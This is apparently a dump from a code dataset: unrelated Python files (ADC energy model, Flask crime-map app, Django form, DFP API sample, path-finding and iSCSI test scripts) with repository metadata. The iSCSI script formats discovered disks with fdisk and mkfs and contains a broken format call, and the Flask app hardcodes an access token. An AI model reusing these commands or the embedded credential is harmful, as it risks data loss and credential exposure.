coefficient = 1
if structure == 'differential':
coefficient = 2
if n < 2:
raise Exception(
"Number of bits must be greater than or equal to 2. ")
# capacitor array, cap_ideal has the shape of (2,n), in which the first row is the sub-capacitor array of the
# MSB capacitor, the second row is the main capacitor array(excluding
# the MSB capacitor)
cap_ideal = np.repeat(np.concatenate(
([2**(n - 2 - i) for i in range(n - 1)], [1]))[np.newaxis, :], 2, axis=0)
weights_ideal = cap_ideal / (2**n)
for i in range(len(code_decimal)):
sw_energy = np.zeros(n)
sw_energy[0] = 0.5 * decision_path[i, 0]
# find the up-switching and down-switching steps
# 1 is the index offset
sw_up_pos = np.where(
decision_path[i, 1:] > decision_path[i, 0:-1])[0] + 1
sw_dn_pos = np.where(
decision_path[i, 1:] < decision_path[i, 0:-1])[0] + 1
# define an array to store the switching types(up or down) of each
# step.
sw_process = np.zeros(n)
sw_process[sw_up_pos], sw_process[sw_dn_pos] = 1.0, 0
# store the bottom plates connection in each step
cap_connect = np.repeat(
np.vstack(
(np.ones(n), np.zeros(n)))[
np.newaxis, :, :], n, axis=0)
# store the voltage at X point ,here the term v_cm - v_in is
# subtracted
v_x = np.zeros(n)
v_x[0] = np.sum(np.multiply(weights_ideal, cap_connect[0]))
# the voltage between top plates and bottom plates
v_cap = np.zeros((n, 2, n))
v_cap[0] = v_x[0] - cap_connect[0]
for k in range(1, n):
# if up-switching: the capacitor with index k-1 in the main capacitor array will be charged to V_ref,
# and the capacitor with same index remains charged to V_ref; if down-switching: the capacitor
# with index k-1 in the sub-capacitor array will be discharged to ground, and the capacitor with the
# same index remains discharged.
cap_connect[k:, :, k - 1] = sw_process[k]
v_x[k] = np.sum(np.multiply(weights_ideal, cap_connect[k]))
v_cap[k] = v_x[k] - cap_connect[k]
# find index of the capacitors charged to the reference
# voltage
c_t_index = np.where(
cap_connect[k] == 1.0) # 2-dimensional index
# energy = - V_ref * ∑(c_t[j] * ∆v_cap[j])
# attention that v_cap is 3d-array, the the slicing index
# should also be 3-dimensional
sw_energy[k] = - np.inner(cap_ideal[c_t_index],
(v_cap[k,c_t_index[0],
c_t_index[-1]] - v_cap[k - 1, c_t_index[0], c_t_index[-1]]))
sw_energy_sum[i] = np.sum(sw_energy)
return coefficient * sw_energy_sum
|
[
"lfc199471@gmail.com"
] |
lfc199471@gmail.com
|
f6e865c5110f9052fdbb39331313e2ca555771da
|
9e1f6ccb24740e5dc51c71b76ffc3df4f561453e
|
/app.py
|
4451f01d8c4e516275d05abca23045fda760067c
|
[] |
no_license
|
AbbieKent/Analyzing-Atlanta-Crime
|
2ed7ed191b757482c1d3f42fb96da53a921b09ee
|
872ecb801b1abec1f41dd732ee9d6f88d70f6072
|
refs/heads/main
| 2023-03-17T17:44:25.125117
| 2021-03-15T21:11:42
| 2021-03-15T21:11:42
| 348,123,489
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,506
|
py
|
from flask import Flask, render_template
from flask import request, url_for, render_template, redirect
import pandas as pd
import numpy as np
import pdb, os
from os import environ
import joblib
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import OneHotEncoder
from sklearn.compose import ColumnTransformer
from sklearn.preprocessing import LabelEncoder
from platform import python_version
print(python_version())
# Create an instance of our Flask app.
app = Flask(__name__)
# Set route
@app.route('/')
def index():
print('STARTING! '*20)
mapbox_access_token = "pk.eyJ1IjoiZGF2aWRjb3kiLCJhIjoiY2tqcHU1YzBzOHY4ZjJxcWpkNGI5b2h2MSJ9.CsPttIW0Q41kP2uOBN6n8g"
# pdb.set_trace()
print(os.getcwd())
# df = pd.read_csv('./static/data/data.csv')
df = pd.read_csv('./static/data/data.csv')
#df = df.head(5)
return render_template('index.html', tables = [df.to_html(classes='female')],
titles=['IDKLOL'],
mapbox_access_token=mapbox_access_token)
@app.route('/neighborhood')
def neighborhood():
return render_template('neighborhood.html')
@app.route('/typesofcrimes')
def crime():
return render_template('crime.html')
@app.route('/timeofyear')
def year():
return render_template('Timeofyear.html')
@app.route('/contactinfo')
def contact():
return render_template('contactinfo.html')
@app.route('/index')
def homepage():
return render_template('index.html')
if __name__ == "__main__":
app.run(debug=True)
|
[
"arkent10@gmail.com"
] |
arkent10@gmail.com
|
b9f5b0e85ced88524ab8f2e59229df6b0f93c821
|
e60a342f322273d3db5f4ab66f0e1ffffe39de29
|
/parts/zodiac/chameleon/__init__.py
|
60fbbb344ac3c226ff2ca2148893e72d3fc26add
|
[] |
no_license
|
Xoting/GAExotZodiac
|
6b1b1f5356a4a4732da4c122db0f60b3f08ff6c1
|
f60b2b77b47f6181752a98399f6724b1cb47ddaf
|
refs/heads/master
| 2021-01-15T21:45:20.494358
| 2014-01-13T15:29:22
| 2014-01-13T15:29:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 75
|
py
|
/home/alex/myenv/zodiac/eggs/Chameleon-2.13-py2.7.egg/chameleon/__init__.py
|
[
"alex.palacioslopez@gmail.com"
] |
alex.palacioslopez@gmail.com
|
91f2e963910d164e1fa3ecf41f3875ae6dd1b8e6
|
4fc5c908df8c0aecb4943e798c9c71c542a96584
|
/samples/practice1_Milana.py
|
3d038dea120dcb17d2a350f9b410f72a73b176fa
|
[
"Apache-2.0"
] |
permissive
|
Milana009/UNN_HPC_SCHOOL_2019_ML
|
84d51cdd7a499139a0297a76522350de74b7ff4c
|
d5bb7a8ab5f026f2bc4df896019ded5987040295
|
refs/heads/master
| 2020-09-13T07:58:32.456350
| 2019-11-19T23:04:02
| 2019-11-19T23:04:02
| 222,703,246
| 1
| 0
|
Apache-2.0
| 2019-11-19T13:31:23
| 2019-11-19T13:31:22
| null |
UTF-8
|
Python
| false
| false
| 1,157
|
py
|
import sys
import cv2
import logging as log
import argparse
sys.path.append('../src')
from imagefilter import ImageFilter
def build_argparse():
parser=argparse.ArgumentParser()
parser.add_argument('-i', '--input', help = 'your input', type = str)
parser.add_argument('-w', '--width', help = 'your width', type = int)
parser.add_argument('-l', '--height', help = 'your height', type = int)
#
# Add your code here
#
return parser
def main():
log.basicConfig(format="[ %(levelname)s ] %(message)s", level=log.INFO, stream=sys.stdout)
log.info("Hello image filtering")
args = build_argparse().parse_args()
imagePath = args.input
log.info(imagePath)
image_source = cv2.imread(imagePath, 1)
log.info(image_source.shape)
myFilter = ImageFilter(gray = True, shape = (args.width, args.height))
image_final = myFilter.process_image(image_source)
cv2.imshow("Image", image_final)
cv2.waitKey(0)
cv2.destroyAllWindows()
#
# Add your code here
#
return
if __name__ == '__main__':
sys.exit(main())
|
[
"Milana_Vagapova"
] |
Milana_Vagapova
|
580dbd15bf43272f28e3f9bd42413a905510cd76
|
bef304291f5fe599f7a5b713d19544dc0cecd914
|
/todoapp/todo_list/forms.py
|
9fe1a617dd0f429fc6c8b3c1fa6885fee975c262
|
[] |
no_license
|
coderj001/django-todo-and-air-quality
|
9ca847143ea86677a0d54026c060638fabf8c042
|
012ee15fa3cfbf1aa08ae4513c3bf4fa828b3ba3
|
refs/heads/master
| 2020-12-14T20:20:49.845722
| 2020-01-19T15:06:42
| 2020-01-19T15:06:42
| 234,855,834
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 147
|
py
|
from django import forms
from .models import ToDoList
class ListForm(forms.ModelForm):
class Meta:
model=ToDoList
fields=['item','completed']
|
[
"amirajubolchi001@gmail.com"
] |
amirajubolchi001@gmail.com
|
aa43f40b58364ba1f55d60b52c75f3e4b4bbfeb9
|
7136e5242793b620fa12e9bd15bf4d8aeb0bfe7a
|
/examples/adspygoogle/dfp/v201101/get_licas_by_statement.py
|
9086f2f5d7006a77c1a7b578138725bf4db3479b
|
[
"Apache-2.0"
] |
permissive
|
hockeyprincess/google-api-dfp-python
|
534519695ffd26341204eedda7a8b50648f12ea9
|
efa82a8d85cbdc90f030db9d168790c55bd8b12a
|
refs/heads/master
| 2021-01-10T10:01:09.445419
| 2011-04-14T18:25:38
| 2011-04-14T18:25:38
| 52,676,942
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,266
|
py
|
#!/usr/bin/python
#
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example gets all line item creative associations (LICA) for a given
line item id. The statement retrieves up to the maximum page size limit of 500.
To create LICAs, run create_licas.py."""
__author__ = 'api.sgrinberg@gmail.com (Stan Grinberg)'
# Locate the client library. If module was installed via "setup.py" script, then
# the following two lines are not needed.
import os
import sys
sys.path.append(os.path.join('..', '..', '..', '..'))
# Import appropriate classes from the client library.
from adspygoogle.dfp.DfpClient import DfpClient
# Initialize client object.
client = DfpClient(path=os.path.join('..', '..', '..', '..'))
# Initialize appropriate service. By default, the request is always made against
# the sandbox environment.
lica_service = client.GetLineItemCreativeAssociationService(
'https://sandbox.google.com', 'v201101')
# Set the id of the line item to get LICAs by.
line_item_id = 'INSERT_LINE_ITEM_ID_HERE'
# Create statement object to only select LICAs for the given line item id.
values = [{
'key': 'lineItemId',
'value': {
'xsi_type': 'NumberValue',
'value': line_item_id
}
}]
filter_statement = {'query': 'WHERE lineItemId = :lineItemId LIMIT 500',
'values': values}
# Get LICAs by statement.
licas = lica_service.GetLineItemCreativeAssociationsByStatement(
filter_statement)[0]['results']
# Display results.
for lica in licas:
print ('LICA with line item id \'%s\', creative id \'%s\', and status '
'\'%s\' was found.' % (lica['id'], lica['creativeId'], lica['status']))
print
print 'Number of results found: %s' % len(licas)
|
[
"api.sgrinberg@7990c6e4-1bfd-11df-85e6-9b4bd7dd5138"
] |
api.sgrinberg@7990c6e4-1bfd-11df-85e6-9b4bd7dd5138
|
3fccf4fa9600a4a3e7b07d4b28660e603bcef30e
|
781e2692049e87a4256320c76e82a19be257a05d
|
/all_data/exercism_data/python/triangle/0296cbe043e446b8b9365e20fb75c136.py
|
18e84ab880631f7510539ae77e9524b0eda2b632
|
[] |
no_license
|
itsolutionscorp/AutoStyle-Clustering
|
54bde86fe6dbad35b568b38cfcb14c5ffaab51b0
|
be0e2f635a7558f56c61bc0b36c6146b01d1e6e6
|
refs/heads/master
| 2020-12-11T07:27:19.291038
| 2016-03-16T03:18:00
| 2016-03-16T03:18:42
| 59,454,921
| 4
| 0
| null | 2016-05-23T05:40:56
| 2016-05-23T05:40:56
| null |
UTF-8
|
Python
| false
| false
| 621
|
py
|
# represents a triangle
class Triangle(object):
_kinds=["equilateral","isosceles","scalene"]
def __init__(self,a,b,c):
if a<=0 or b<=0 or c<=0:
raise TriangleError("Triangles cannot have zero or negative side length.")
if a+b<=c or a+c<=b or b+c<=a:
raise TriangleError("Triangles must satisfy the triangle inequality.")
self.sides=sorted([a,b,c])
def kind(self):
return Triangle._kinds[len(set(self.sides))-1]
# some sort of error was encountered when constructing a Triangle
class TriangleError(Exception):
def __init__(self,message):
super(TriangleError,self).__init__(message)
|
[
"rrc@berkeley.edu"
] |
rrc@berkeley.edu
|
6b2843c0a678ffe8be10b0d147adee1740dc58da
|
a5f8eb72e680a906f74ae53d2b6428fbb008320c
|
/31-zip.py
|
a48620bb23a58f1ecfdebf53d239f9cf71d077e5
|
[] |
no_license
|
arn1992/Basic-Python
|
0588858aed632ac9e65e5618d5b57bcbe71c45bc
|
09b9bf2364ddd2341f95445e18868e2e0904604d
|
refs/heads/master
| 2020-06-28T18:35:32.394730
| 2016-12-15T07:21:33
| 2016-12-15T07:21:33
| 74,483,622
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 127
|
py
|
first=['ratul','aminur','arn']
last=['tasneem','ishrar']
names=zip(first,last)
for a,b in names:
print(a,b)
|
[
"noreply@github.com"
] |
arn1992.noreply@github.com
|
9b500090e5537a2b729caa78d0590d8753bbca89
|
b92adbd59161b701be466b3dbeab34e2b2aaf488
|
/.c9/metadata/environment/fb_post_learning/fb_post_clean_arch/views/delete_post/api_wrapper.py
|
34ca1ee1bb0f47da7e80c5643b393f16129c97b8
|
[] |
no_license
|
R151865/cloud_9_files
|
7486fede7af4db4572f1b8033990a0f07f8749e8
|
a468c44e9aee4a37dea3c8c9188c6c06e91cc0c4
|
refs/heads/master
| 2022-11-22T10:45:39.439033
| 2020-07-23T09:31:52
| 2020-07-23T09:31:52
| 281,904,416
| 0
| 1
| null | 2022-11-20T00:47:10
| 2020-07-23T09:08:48
|
Python
|
UTF-8
|
Python
| false
| false
| 480
|
py
|
{"filter":false,"title":"api_wrapper.py","tooltip":"/fb_post_learning/fb_post_clean_arch/views/delete_post/api_wrapper.py","undoManager":{"mark":-1,"position":-1,"stack":[]},"ace":{"folds":[],"scrolltop":0,"scrollleft":0,"selection":{"start":{"row":17,"column":17},"end":{"row":17,"column":75},"isBackwards":true},"options":{"guessTabSize":true,"useWrapMode":false,"wrapToView":true},"firstLineState":0},"timestamp":1590407780811,"hash":"c7949160d2afabed4398d4df3013ec47e225082d"}
|
[
"r151865@rguktrkv.ac.in"
] |
r151865@rguktrkv.ac.in
|
8c933fd456834988004265d8cb6e1a7801ec7b35
|
b013eb7ffc0c41e874c04a55065de96a9313ab17
|
/longest_path1.py
|
f3d3b164a7b8e8b0244d280f07fd701a95f4287a
|
[] |
no_license
|
YuiGao/shortest_longest_path
|
69fcf5724cfb03e7a94f33b507fa25e7c41f69ed
|
111d85c2fa090b497cc2896ddf644a21ffc4e69f
|
refs/heads/master
| 2020-05-07T19:29:09.282219
| 2019-04-11T14:54:47
| 2019-04-11T14:54:47
| 180,815,191
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,509
|
py
|
nodes = ('A', 'B', 'C', 'D', 'E', 'F', 'G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z')
distances = {
'A':{'B':5,'C':6,'D':4,'E':7},
'B':{'A':5,'F':2,'G':3},
'C':{'A':6,'F':6,'G':4,'H':1},
'D':{'A':4,'G':7,'H':3,'I':6},
'E':{'A':7,'H':9,'I':1},
'F':{'B':2,'C':6,'J':2,'K':3},
'G':{'B':3,'C':4,'D':7,'J':6,'K':4,'L':1},
'H':{'C':1,'D':3,'E':9,'K':7,'L':3,'M':6},
'I':{'D':6,'E':1,'L':9,'M':7},
'J':{'F':2,'G':6,'N':2,'O':3},
'K': {'F': 3, 'G': 4, 'H': 7, 'N': 6, 'O': 4, 'P': 1},
'L': {'G': 1, 'H': 3, 'I': 9, 'O': 7, 'P': 10, 'Q': 6},
'M': {'H': 6, 'I': 7, 'P': 9, 'Q': 8},
'N': {'J': 2, 'K': 6, 'R': 2, 'S': 3},
'O': {'J': 3, 'K': 4, 'L': 7, 'R': 6, 'S': 4, 'T': 1},
'P': {'K': 1, 'L': 10, 'M': 9, 'S': 7, 'T': 3, 'U': 6},
'Q': {'L': 6, 'M': 8, 'T': 9, 'U': 1},
'R': {'N': 2, 'O': 6, 'V': 2, 'W': 3},
'S': {'N': 3, 'O': 4, 'P': 7, 'V': 6, 'W': 4, 'X': 1},
'T': {'O': 1, 'P': 3, 'Q': 9, 'W': 7, 'X': 3, 'Y': 6},
'U': {'P': 6, 'Q': 1, 'X': 9, 'Y': 1},
'V': {'R': 2, 'S': 6, 'Z': 5},
'W': {'R': 3, 'S': 4, 'T': 7, 'Z': 6},
'X': {'S': 1, 'T': 3, 'U': 9, 'Z': 4},
'Y': {'T': 6, 'U': 1, 'Z': 7},
'Z': {'V': 5, 'W': 6, 'X': 4, 'Y': 7}
}
unvisited = {node: None for node in nodes} #把None作为无穷大使用
visited = {}#用来记录已经松弛过的数组
current = 'A' #要找A点到其他点的距离
currentDistance = 0
unvisited[current] = currentDistance#A到A的距离记为0
while True:
for neighbour, distance in distances[current].items():
if neighbour not in unvisited: continue#被访问过了,跳出本次循环
newDistance = currentDistance + distance#新的距离
if unvisited[neighbour] is None or unvisited[neighbour] < newDistance:#如果两个点之间的距离之前是无穷大或者新距离小于原来的距离
unvisited[neighbour] = newDistance#更新距离
visited[current] = currentDistance#这个点已经松弛过,记录
del unvisited[current]#从未访问过的字典中将这个点删除
if not unvisited: break#如果所有点都松弛过,跳出此次循环
candidates = [node for node in unvisited.items() if node[1]]#找出目前还有拿些点未松弛过
current, currentDistance = sorted(candidates, key = lambda x: x[1])[0]#找出目前可以用来松弛的点
if(current == "Z"):
print('Start-End最长路径长度为:',currentDistance)
|
[
"1205319351@qq.com"
] |
1205319351@qq.com
|
d1877db7913e58c396ec934ebb1dc1c993bcbbb5
|
892dd32ee0be7135cd33c875b06dcc66307dcc99
|
/automation/MPTS/verifyIqn.py
|
b82a09a932deb898ea00bc911d3867e80a4c52da
|
[] |
no_license
|
cloudbytestorage/devops
|
6d21ed0afd752bdde8cefa448d4433b435493ffa
|
b18193b08ba3d6538277ba48253c29d6a96b0b4a
|
refs/heads/master
| 2020-05-29T08:48:34.489204
| 2018-01-03T09:28:53
| 2018-01-03T09:28:53
| 68,889,307
| 4
| 8
| null | 2017-11-30T08:11:39
| 2016-09-22T05:53:44
|
Python
|
UTF-8
|
Python
| false
| false
| 5,429
|
py
|
import json
import sys
import time
from time import ctime
from cbrequest import configFile, executeCmd, executeCmdNegative, resultCollection, getoutput
config = configFile(sys.argv);
stdurl = 'https://%s/client/api?apikey=%s&response=%s&' %(config['host'], config['apikey'], config['response'])
negativeFlag = 0
if len(sys.argv)== 3:
if sys.argv[2].lower()== "negative":
negativeFlag = 1;
else:
print "Argument is not correct.. Correct way as below"
print " python verifyIqn.py config.txt"
print " python verifyIqn.py config.txt negative"
exit()
for x in range(1, int(config['Number_of_ISCSIVolumes'])+1):
startTime = ctime()
executeCmd('mkdir -p mount/%s' %(config['voliSCSIMountpoint%d' %(x)]))
### Discovery
iqnname = getoutput('iscsiadm -m discovery -t st -p %s:3260 | grep %s | awk {\'print $2\'}' %(config['voliSCSIIPAddress%d' %(x)],config['voliSCSIMountpoint%d' %(x)]))
# for negative testcase
if negativeFlag == 1:
###no iscsi volumes discovered
if iqnname==[]:
print "Negative testcase-iscsi volume %s login failed on the client with dummy iqn and ip, testcase passed" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("Negative testcase-iscsi volume %s login failed on the client with dummy iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["PASSED",""], startTime, endTime)
### some iscsi volumes discovered
else:
output=executeCmd('iscsiadm -m node --targetname "%s" --portal "%s:3260" --login | grep Login' %(iqnname[0].strip(), config['voliSCSIIPAddress%d' %(x)]))
### iscsi volume login successfull
if output[0] == "PASSED":
print "Negative testcase-iscsi volume %s login passed on the client with dummy iqn and ip, test case failed" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("Negative testcase-iscsi volume %s login passed on the client with dummy iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["FAILED",""], startTime, endTime)
### iscsi volume login unsuccessfull
else:
print "Negative testcase-iscsi volume %s login failed on the client with dummy iqn and ip, testcase passed" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("Negative testcase-iscsi volume %s login failed on the client with dummy iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["PASSED",""], startTime, endTime)
# for positive testcase
else:
###no iscsi volumes discovered
if iqnname==[]:
print "iscsi volume %s login failed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("iscsi volume %s login failed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["FAILED",""], startTime, endTime)
### some iscsi volumes discovered
else:
output=executeCmd('iscsiadm -m node --targetname "%s" --portal "%s:3260" --login | grep Login' %(iqnname[0].strip(), config['voliSCSIIPAddress%d' %(x)]))
### iscsi volume login successfull
if output[0] == "PASSED":
print "iscsi volume %s login passed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("iscsi volume %s login passed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["PASSED",""], startTime, endTime)
#### if login successfull mount and copy some data
device = getoutput('iscsiadm -m session -P3 | grep \'Attached scsi disk\' | awk {\'print $4\'}')
device2 = (device[0].split('\n'))[0]
executeCmd('fdisk /dev/%s < fdisk_response_file' (device2))
executeCmd('mkfs.ext3 /dev/%s1' %(device2))
executeCmd('mount /dev/%s1 mount/%s' %(device2, config['voliSCSIMountpoint%d' %(x)]))
executeCmd('cp testfile mount/%s' %(config['voliSCSIMountpoint%d' %(x)]))
output=executeCmd('diff testfile mount/%s' %(config['voliSCSIMountpoint%d' %(x)]))
if output[0] == "PASSED":
endtime = ctime()
resultCollection("Creation of File on ISCSI Volume %s passed on the client with iqn and ip credentials" %(config['voliSCSIDatasetname%d' %(x)]),["PASSED",""], startTime, endTime)
else:
endtime = ctime()
resultCollection("Creation of File on ISCSI Volume %s passed on the client with iqn and ip credentials" %(config['voliSCSIDatasetname%d' %(x)]),["FAILED",""], startTime, endTime)
### iscsi volume login unsuccessfull
else:
print "iscsi volume %s login failed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("iscsi volume %s login failed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["FAILED",""], startTime, endTime)
### logout
output=executeCmd('iscsiadm -m node --targetname "%s" --portal "%s:3260" --logout | grep Logout' %(iqnname[0].strip(), config['voliSCSIIPAddress%d' %(x)]))
|
[
"karthik.s@cloudbyte.com"
] |
karthik.s@cloudbyte.com
|
4327917009b231fd6cbcb15c547b3403e777d4b3
|
856762ba0c6c69f4b086689764fad0d019a50146
|
/图片颜色分割.py
|
9d7ada5b5d96e3196d6bf53313ed2f2350199158
|
[] |
no_license
|
JonathanScoot/Events
|
bc9ec0194a972fe677693a1a8bff7539ff474bbf
|
795442eb56345b876847ce3c32ea4ea0631ddfb9
|
refs/heads/master
| 2020-04-30T13:37:13.664734
| 2019-03-21T03:33:32
| 2019-03-21T03:33:32
| 176,863,623
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 234
|
py
|
import cv2
import numpy as np
cap = cv2.imread('/Users/wangjie/Desktop/road1.jpg', 0)
while True:
displayimage = cv2.imshow('road', cap)
k=cv2.waitKey(5) &0xFF
if k==27:
break
cv2.destroyAllWindows()
cv2.line()
|
[
"Jonathan@MacBook-Pro-2.lan"
] |
Jonathan@MacBook-Pro-2.lan
|
8d311b4049baf3cfb4d2c9c41c06f410bd88211c
|
74e6ea749db5e989dcec9e85a6dadab44b73a91e
|
/restserver1/quickstart/svm.py
|
5aaf952eb9b89fe62df47c84fe7b73d10361507e
|
[] |
no_license
|
torahss/restserver
|
94d373c31cc54aef32f3eeb24844c6c4af7be604
|
dadcb1c8c08b7af375bda3f9c2bca47a63a5b761
|
refs/heads/master
| 2023-02-02T12:48:38.672797
| 2020-12-21T12:50:16
| 2020-12-21T12:50:16
| 323,330,851
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,228
|
py
|
from sklearn.svm import SVC
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split
import pandas as pd
def svmRun(inputdata) :
data = pd.read_csv('/var/www/restserver/quickstart/train.csv', header=0, index_col=0, squeeze=True)
dataset = pd.DataFrame(data)
t_data = pd.read_csv('/root/Downloads/test.csv', header=0, index_col=0, squeeze=True)
t_data = pd.DataFrame(t_data)
tr_y = dataset.iloc[:,4]
tr_data = dataset.iloc[:, [0, 1, 2, 3]]
test_y = t_data.iloc[:,4]
t_data = t_data.iloc[:, [0, 1, 2, 3]]
svm = SVC(kernel='rbf',C=1.0, random_state=1, gamma=0.1)
svm.fit(tr_data,tr_y)
#print(inputdata[0][1])
y_pre_test = svm.predict(t_data)
t_data.iloc[1:2,0] = inputdata[0][0]
t_data.iloc[1:2, 1] = inputdata[0][1]
t_data.iloc[1:2, 2] = inputdata[0][2]
t_data.iloc[1:2, 3] = inputdata[0][3]
y_pred = svm.predict(t_data.iloc[1:2, ])
if y_pred[0] == 'Good' :
result = 0
elif y_pred[0] == 'Normal' :
result = 1
elif y_pred[0] == 'Bad':
result = 2
elif y_pred[0] == 'Worst':
result =3
print("Accuracy : %.2f" % accuracy_score(test_y, y_pre_test))
return result
|
[
"sungsamhong@gmail.com"
] |
sungsamhong@gmail.com
|
431bab8eea3abbc7fae959c140647f6a74cb2440
|
a266cfe89cf9c7347abf712e3b800468438448c2
|
/extra_addons/formio_data_api/__manifest__.py
|
1449bd63251da49b08f0d9e19d5075ac17b82eaf
|
[] |
no_license
|
cialuo/project_template
|
db8b9f9c4115a6d44363a39e311363e8f3e7807f
|
2f875bdc5b730afeae3dd8dffafde852d0a44936
|
refs/heads/main
| 2023-03-09T17:50:55.398557
| 2021-02-24T00:17:59
| 2021-02-24T00:17:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 669
|
py
|
# Copyright Nova Code (http://www.novacode.nl)
# See LICENSE file for full licensing details.
{
'name': 'Forms | Data API',
'summary': 'Python API for Forms data (builder, form/submission).',
'version': '0.5',
'license': 'LGPL-3',
'author': 'Nova Code',
'website': 'https://www.novacode.nl',
'live_test_url': 'https://demo13.novacode.nl',
'category': 'Extra Tools',
'depends': ['formio'],
'data': [],
'external_dependencies': {
'python': ['formio-data'],
},
'application': False,
'images': [
'static/description/banner.gif',
],
'description': """
Forms | Data API
================
"""
}
|
[
"dungth@trobz.com"
] |
dungth@trobz.com
|
d115bee72cd6afec3acc95c9eb09d4221573f345
|
9abebf3d5b197a20a16829035e8d3623220c7822
|
/Chapter3/BigOListIndex.py
|
d355aab09621e3116e41f59a31b87c89427a2f5c
|
[] |
no_license
|
JoeVentrella/CS260
|
61e4e834f6c767d80cfe1e19460168f707e15bcd
|
a717f4b476b6e80f25cd74c8effc343624ec9b42
|
refs/heads/master
| 2020-08-08T04:19:33.906563
| 2019-12-15T01:54:40
| 2019-12-15T01:54:40
| 213,710,821
| 0
| 0
| null | 2019-10-08T17:57:35
| 2019-10-08T17:42:15
| null |
UTF-8
|
Python
| false
| false
| 765
|
py
|
import random
import timeit
exampleList = list(range(10000))
num = 10000
def bigOForListIndex(exampleList, n):
"""
Experiment to verify list index is O(1)
"""
for i in range(num):
index = random.randint(0, num-1)
exampleList[index]
def main():
for n in range(1000000, 10000001, 1000000):
exampleList = list(range(n))
indexTime = timeit.Timer("bigOForListIndex(exampleList,"+str(n)+")",
"from __main__ import exampleList,\
bigOForListIndex")
it = indexTime.timeit(number=1)
print ("Length of time for %d index access in %d list of"\
"numbers :%15.9f seconds" % (num, n, it))
if __name__ == '__main__':
main()
|
[
"ventrellajoe1@gmail.com"
] |
ventrellajoe1@gmail.com
|
748f97751e80a2258b78d59ce4a378db9a54d1b5
|
b743a6b89e3e7628963fd06d2928b8d1cdc3243c
|
/bpl_client/Client.py
|
c9143098c648f30df369d458d22b99d0e6d61a3a
|
[
"MIT"
] |
permissive
|
DuneRoot/bpl-cli
|
847248d36449181856e6cf34a18119cd9fc1b045
|
3272de85dd5e4b12ac5b2ad98bf1e971f3bf5c28
|
refs/heads/master
| 2020-03-25T17:42:06.339501
| 2019-02-20T19:20:26
| 2019-02-20T19:20:26
| 143,990,801
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,781
|
py
|
"""
BPL Client
Usage:
bpl-cli network config new
bpl-cli network config use
bpl-cli network config show
bpl-cli network peers
bpl-cli network status
bpl-cli account create
bpl-cli account status <address>
bpl-cli account transactions <address>
bpl-cli account send <amount> <recipient>
bpl-cli account vote <username>
bpl-cli account delegate <username>
bpl-cli message sign <message>
bpl-cli message verify <message> <publicKey>
Options:
-h --help Show this screen.
--version Show version.
Help:
For help using this client, please see https://github.com/DuneRoot/bpl-cli
"""
from importlib import import_module
from functools import reduce
from docopt import docopt
import json
from bpl_client.helpers.Constants import COMMANDS_JSON
from bpl_client.helpers.Util import read_file
from bpl_client import __version__
class Client:
def __init__(self):
"""
Client Class.
Retrieves options from docopt. Options are then filtered using data stored in commands.json.
Command is then imported and instantiated.
"""
self._options = docopt(__doc__, version=__version__)
self._arguments = {
k: v for k, v in self._options.items()
if not isinstance(v, bool)
}
commands_json = json.loads(read_file(COMMANDS_JSON))
command = list(filter(lambda x: self._is_command(x["Conditions"]), commands_json))[0]
getattr(
import_module("bpl_client.commands.{0}".format(command["Module Identifier"])),
command["Class Identifier"]
)(self._arguments).run()
def _is_command(self, conditions):
return reduce(lambda x, y: x and y, map(lambda y: self._options[y], conditions))
|
[
"johnyob132@gmail.com"
] |
johnyob132@gmail.com
|
cdf669514aaf2c1d7c33248746135d7b0232f29f
|
184ab7b1f5d6c4a4382cf4ffcf50bbad0f157ef1
|
/library/aht10/aht10_example.py
|
46df77a8a71666025fda1409a3c5b7ebdbed9497
|
[] |
no_license
|
RT-Thread/mpy-snippets
|
fdd257bb9f44cdc92e52cd39cdc88a57d736fb26
|
9296d559da275f51845cb9c2f8e2010f66f72cc1
|
refs/heads/master
| 2023-06-14T02:20:05.449559
| 2020-06-03T02:34:47
| 2020-06-03T02:35:19
| 198,854,793
| 28
| 18
| null | 2020-05-06T11:32:46
| 2019-07-25T15:14:56
|
Python
|
UTF-8
|
Python
| false
| false
| 517
|
py
|
from machine import I2C, Pin
from aht10 import AHT10
PIN_CLK = 54 # PD6, get the pin number from get_pin_number.py
PIN_SDA = 33 # PC1
clk = Pin(("clk", PIN_CLK), Pin.OUT_OD) # Select the PIN_CLK as the clock
sda = Pin(("sda", PIN_SDA), Pin.OUT_OD) # Select the PIN_SDA as the data line
